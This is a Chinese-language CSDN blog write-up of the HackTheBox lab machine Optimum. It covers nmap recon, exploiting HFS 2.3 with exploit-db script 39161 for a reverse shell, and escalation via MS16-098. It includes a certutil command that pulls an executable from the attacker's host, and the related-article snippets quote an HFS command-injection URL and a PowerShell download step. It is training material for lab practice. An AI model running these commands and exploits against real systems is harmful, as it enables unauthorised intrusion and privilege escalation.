HackTheBox::Optimum

最新推荐文章于 2024-08-31 23:25:02 发布
最新推荐文章于 2024-08-31 23:25:02 发布
阅读量104 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127243887
版权

0x00信息收集

nmap -Pn -sV 10.10.10.8

查看80端口的服务,得到使用的服务为HFS,且版本信息为2.3

通过expliot-db找到可利用的漏洞点

0x00 漏洞利用

下载相关脚本 https://www.exploit-db.com/exploits/39161
根据脚本提示,拷贝nc.exe文件并开启在80端口开启http服务

修改相关代码
![](https://img-blog.csdnimg.cn/img_convert/4babf642c859666bb22a29f2594cc85c.png
使用脚本,反弹shell

0x02 权限提升

https://github.com/AonCyberLabs/Windows-Exploit-Suggester
先根据systeminfo查找是否有可利用的地方

./windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo

根据得到的信息,可以利用MS16-098进行提权
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098

certutil.exe -urlcache -f http://10.10.14.40:80/bfill.exe bfill.exe


aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-optimum(考点:hfs/windows)不用msf
冬萍子癸水
04-10 478
用msf做很快。这台靶机很多人做以及写的writeup都是msf。但针对oscp备考者,本篇文章不用msf nmap 就一个80,提示是HFS 2.3 直接搜searchsploit hfs 用python比较方便,就选择39161.py 打开py看看,有几处要修改。IP端口当然要改成自己的。看样子这是个直接弹shell到本机的py。另外我还看到代码里有nc,而且还是从本机的http里open...
Hackthebox :: optimum反思和总结
Soul Blog
11-22 1138
Hackthebox :: optimum反思和总结 optimumhackthebox上一台简单的windows靶机 反思 这台靶机我顺利的找到了突破口,但是msf中的post/multi/recon/local_exploiter_suggester 模块并没有用 使用别人提供的windows-exploit-suggester.py 出现了问题,需要pip2 总结 上一篇靶机的反思与总结中我也提到了post/multi/recon/local_exploiter_suggester 模块
Hack the box靶机 Optimum
菜浪马废的博客
05-28 276
拿到user.txt msf关于win的提权 还是要再看看 要不不会 今天先这样吧 睡觉
Hackthebox:Granny Walkthrough(not use metasploit)
汗的博客
12-06 1071
预备知识 nikto、nmap、iis6.0的webdav、davtest 信息收集a nmap 10.10.10.15 只开了个80端口,那么还是web,浏览器访问目标机器 直接就是报错页面,迷惑,不过可知服务器是iis 扫了下目录,毫无思路,nmap扫下漏洞 nmap -script=vuln 10.10.10.15 还是没什么发现 nikto 扫一下,这次的信息就多了 nikto -h http://10.10.10.15 + Server: Microsoft-IIS/6.0 + Retrieved
HackTheBox::Bastard
aya3t的博客
10-10 115
HackTheBox::Optimum
HacktheboxOptimum Walkthrough(not use metasploit)
汗的博客
12-06 526
信息收集 nmap 10.10.10.8 发现只开了一个80端口的http 浏览器打开 google可知HFS的含义是Http File Server,可以上传文件,页面也显示HttpFileServer 2.3 查找相关漏洞 searchsploit HFS -----------------------------------------------------------------------------------------------------------------------------
hack the box optimum靶机
zr1213159840的博客
04-21 2189
首先打开靶场,直接nmap开扫。 nmap -sV -Pn -A 10.10.10.8 通过扫描结果知道开启了80端口,80端口跑了HFS服务。顺势去msf搜索一下HFS有哪些漏洞 search hfs 使用下面的hfs的命令执行,然后看下要配置哪些东西 use 1 options 需要配置好远程主机,本地主机,配置好,run。多run几次,前面几次容易失败,而且要等挺久的。 set RHOSTS 10.10.10.8 set LHOSTS 10.10.14.17 run 利用成功后,返回me
HackTheBox-Optimum
weixin_45345568的博客
10-09 382
HackTheBox-Optimum ip:10.10.10.8 0x01 信息搜集: 1.nmap扫描IP nmap -A -Pn 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 16:05 CST Nmap scan report for 10.10.10.8 Host is up (0.34s latency). Not shown: 999 filtered ports PORT STATE SERVICE VE
[Hack The Box]靶机8 Optimum
Huamang的博客
04-01 450
nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看 打开是HFS,nmap扫出来是HFS2.3 这个版本的HFS是有cve的 https://nvd.nist.gov/vuln/detail/CVE-2014-6287 msf有这个模块 直接拿下shell 拿到user.txt 进不了admin,需要提权 本地起一个python服务,把winpeas传上去 powershell -c "(new-object System.Net.WebClient).Dow.
HTB Optimum[Hack The Box HTB靶场]writeup系列6
重新启程
02-04 3141
这是HTB retire machine的第六台靶机 目录 0x00 靶机情况 0x01 信息搜集 端口扫描 检索应用 0x02 get webshell 0x03 提权 mfs中查找提权程序 执行systeminfo 执行windows-exploit-suggester.py 执行ms16-098 0x00 靶机情况 可以看到这台靶机是windows的靶机,难...
HackTheBox-optimum&shocker渗透测试
weixin_43111940的博客
04-16 279
optimum 端口 sudo nmap -sC -sV -A -p 80 10.10.10.8 可以看到是fileserver和对应的版本2.3 找到对应的CVE-2014-6287 看一下这个漏洞的详细信息,就是一个类似00截断去执行命令的RCE http://localhost:80/?search=%00{.exec|cmd.} bp抓包修改参数 kali监听网卡 sudo tcpdump -i tun0 抓到了icmp包,可以命令执行 在靶机上执行powershell命令来下载攻击机上
minio最新源码编译(处理安全扫描中跨域访问、.js.map等不安全问题) 版本:RELEASE.2024-06-26T01-06-18Z
最新发布
逝水无痕博客
08-31 1062
minio最新源码编译(处理安全扫描中跨域访问、.js.map等不安全问题) 版本:RELEASE.2024-06-26T01-06-18Z
HarmonyOS(52) 使用安全控件SaveButton保存图片
菜鸟博客
08-30 1051
SaveButton 安全控件说明
守护夏日清凉:EasyCVR+AI视频智能管理方案为水上乐园安全保驾护航
TSINGSEE青犀视频官方技术博客
08-28 2831
多协议接入:支持国标GB/T28181协议、JT808、GA/T1400、RTMP、RTSP/Onvif协议、海康Ehome、海康SDK、大华SDK、华为SDK、宇视SDK、乐橙SDK、萤石云SDK等接入,兼容性强。
Python编码系列—Python中的安全密码存储与验证:实战指南
u013889591的专栏
08-27 1336
在数字化时代,密码安全是保护用户数据的首要防线。Python提供了多种工具和库来帮助开发者实现安全的密码存储与验证。本文将深入探讨Python中实现安全密码存储与验证的方法,结合实际案例来讲解。随着网络攻击的日益增多,传统的密码存储方法(如明文存储或使用弱哈希算法)已不再安全。现代Web应用需要采用更安全的策略来保护用户密码,防止数据泄露和未授权访问。安全的密码存储与验证是保护用户数据不被未授权访问的关键。通过使用Python中的hashlib库和盐值,结合密钥派生函数,可以大大提高密码的安全性。
DNS部署与安全
m0_64827698的博客
08-28 1489
子域 二级域 顶级域 根域。本地域名服务器(代替主机迭代)去找根域名服务器——>...服务器——>权威服务 客户端。特定服务 公司或组织的名称 公司/国家/...(网站性质或地域)DNS缓存投毒(改映射)、DNS放大攻击(分布拒绝服务DDOS)、子域名劫持。主机找网关(本地域名服务器) 客户端。DNS查询(小数据包,要求速度快),www通常指公司网站的主服务器。
掌控安全CTF-2024年8月擂台赛-ez_misc
ASD830的博客
08-28 542
用得到的密码(the_password_is_zkaq!)去解密 最后的秘密.zip 压缩包,可以得到一个key.txt和一个加密的flag.zip。这里我们没啥信息可用的了,返回去看看 最后的秘密.zip 压缩包有注释(我最喜欢和超人一起下棋了,哈哈哈哈哈哈!发现需要密钥,超人超人,猜测为“superman”,解密成功得到新的key:s1mple。找到了通往大千世界的旗帜,请提交你的旗帜,然后继续环游世界吧!我们就可以猜测为棋盘解密,找个解密网站(再往下我们又会找到rsa.txt。
网络安全服务基础Windows--第8节-DHCP部署与安全
m0_65771743的博客
08-28 1386
(2)当clientIP地址已经⽤到50%的时间,续租⼀下,client端就会以单播形式向服务端发送⼀个DHCP Request包,server没有响应,client会继续使⽤,当使⽤到87.5%时,会在续租⼀次,同时就以⼴播的⽅式是发送⼀个request包,server这时收到响应以后,就会回应⼀个ACK包,重新约定⼀个时间。4.服务器 ping ⼏次(⼀般是三次)这个IP ,如果没有响应的话,就说明这个IP现在是空闲的 ,可以分配给客户机,所以向客户机发送DHCP_ACK报⽂,确认可以分配。
Optimum Signal Processing: An Introduction
"Optimum Signal Processing - An Introduction, Second Edition by Sophocles J. Orfanidis" 《最优信号处理》是Sophocles J. Orfanidis教授撰写的一本教材,适用于深入学习信号处理的读者。这本书的第二版于1988...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值